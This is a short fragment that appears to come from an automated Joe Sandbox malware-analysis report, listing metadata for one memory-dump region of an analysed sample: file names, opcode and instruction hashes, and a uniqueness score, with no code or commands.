                          Memory Dump Source
                          • Source File: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_SecuriteInfo.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                          • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                          • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                          • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                          Uniqueness

                          Uniqueness Score: -1.00%